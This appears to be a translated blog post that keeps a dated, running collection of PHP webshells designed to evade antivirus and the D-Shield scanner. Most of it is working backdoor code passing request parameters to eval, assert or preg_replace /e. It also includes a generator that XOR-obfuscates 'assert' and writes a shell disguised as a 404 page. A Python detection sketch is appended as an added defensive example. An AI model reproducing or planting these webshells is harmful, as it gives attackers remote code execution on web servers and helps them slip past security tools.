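Warning
This article was last updated on 2019-08-12; its content may be out of date.
I plan to keep a long-running, regularly updated summary of AV-evading webshells.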
2019-10-12
Bypass with a single symbol
https://forum.90sec.com/t/topic/513/1
```php
<?php
function test($name){#
    eval($name);
}
test($_GET['code']);
?>
```
2019-08-15
https://evi1.cn/post/bypass-shell/
```php
<?php
$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";
```
2019-08-12
![](https://y4er.com/img/uploads/20190812215816.png)
2019-08-09
Evasion frenzy
![](https://y4er.com/img/uploads/20190809144327.png)
2019-08-07
```php
<?php
function a()
{
    return '' + @$_POST['a'];
}
eval(a());
```
And another one, using a ternary expression
![](https://y4er.com/img/uploads/20190807111622.png)
2019-08-06
Getting past D盾 (D-Shield) with a constant
https://secquan.org/Notes/1069997
```php
<?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>
```
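Another approach: get past D盾 via deserialization; write the code yourself.
Yet another approach: create an object and repeatedly define its member variables to get past D盾.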
2019-05-30
Using non-displayable ASCII characters as variable names to get past D盾
https://github.com/th1k404/unishell
http://ascii.911cha.com/
```php
<?php
if($_GET['␄']){
    $␄=$_GET['␄'];
    @preg_replace("/abcde/e",$␄, "abcdefg");
}
?>
```
You can modify it yourself.
2019-05-21
https://github.com/yzddmr6/webshell-venom
Uses random XOR to evade D盾 indefinitely.
For the AntSword plugin version, see:
https://github.com/yzddmr6/as_webshell_venom
```php
<?php
//code by Mr6
error_reporting(0);
function randomkeys($length)
{
    $pattern = '`[email protected]#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    for($i=0;$i<$length;$i++)
    {
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)}; // pick a random character
    }
    return $key;
}
function randname($length)
{
    $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    for($i=0;$i<$length;$i++)
    {
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)}; // pick a random character
    }
    return $key;
}
$str=randomkeys(6);
$bname=randname(4);
$lname=strrev(strtolower($bname));
$str2="assert";
echo "<?php \n";
echo "header('HTTP/1.1 404');\n";
echo "class ".$bname."{ public \$c='';\nfunction __destruct(){\n";
for ($i=0;$i<6;$i++)
{
    $name="_".$i;
    $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
    echo "$"."$name=";
    echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
}
$aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
echo $aa;
echo "\n";
echo '@$db ("$this->c");}}';
echo "\n";
echo "\${$lname}=new {$bname}();\n";
echo "@\${$lname}->c=\$_POST['Mr6'];\n";
echo "?>\n";
@$file=$_GET['file'];
$html = ob_get_contents();
if (isset($file)){
    if(file_put_contents($file,$html))
        echo "\n\n\n".$file." save success!";}
else {echo "Please input the file name like '?file=xxx.txt'";}
?>
```
2019-05-11
```php
<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>
```
![](https://y4er.com/img/uploads/20190511171755.png)
```php
<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}
```
![](https://y4er.com/img/uploads/20190511183608.png)
The pattern that emerges is that when an already-defined variable has the same name as the loop variable, D盾 is not as sensitive.
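Added example, not part of the original post or of any project it links: a Python sketch of how a defender might flag the constructs collected above by their sink or shape instead of a fixed signature, so that renaming a variable or wrapping a call in a function does not change the verdict. The rule names, `scan`, and the sample strings are constructed for illustration.

```python
import re

# Structural heuristics, one per construct collected on this page.
# They key on the sink or the shape, not on a fixed byte signature.
RULES = {
    "dynamic-eval-sink": re.compile(r"\b(?:eval|assert)\s*\(", re.I),
    "preg-replace-e-modifier": re.compile(
        r"preg_replace\s*\(\s*['\"].*?/[a-z]*e[a-z]*['\"]", re.I),
    "variable-function-call": re.compile(r"\$\w+\s*\("),
    "case-insensitive-define": re.compile(
        r"\bdefine\s*\([^;]*,\s*true\s*\)", re.I),
    "code-in-string-interpolation": re.compile(r"\{\$\{[^}]*\("),
    "xor-string-building": re.compile(r"(['\"])[^'\"]*\1\s*\^\s*['\"]"),
    # A '$' followed by anything outside printable ASCII; this also flags
    # legitimate non-ASCII variable names, so treat it as a review hint.
    "non-printable-identifier": re.compile(r"\$[^\x20-\x7e\s]"),
}
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")


def scan(source: str) -> dict:
    """Return the rules that fire and whether request input is present."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(source))
    tainted = bool(REQUEST_INPUT.search(source))
    return {"rules": hits, "request_input": tainted,
            "suspicious": bool(hits) and tainted}


# Constructed sample inputs modelled on the snippets above, plus a benign one.
SAMPLES = {
    "wrapped_eval": "<?php function test($name){#\neval($name);\n}\n"
                    "test($_GET['code']);",
    "interpolation": "<?php $a = $_POST['cmd'];\n"
                     "$var = \"phpnb {${eval($a)}}\";",
    "constant": "<?php $a=$_GET['a'];\ndefine(\"Test\", \"$a\",true);\n"
                "assert(TesT);",
    "benign": "<?php echo htmlspecialchars($_GET['q'], ENT_QUOTES);",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan(src))
```

These are line-level regex heuristics; a production scanner would tokenize the PHP and track data flow from request variables to the sink.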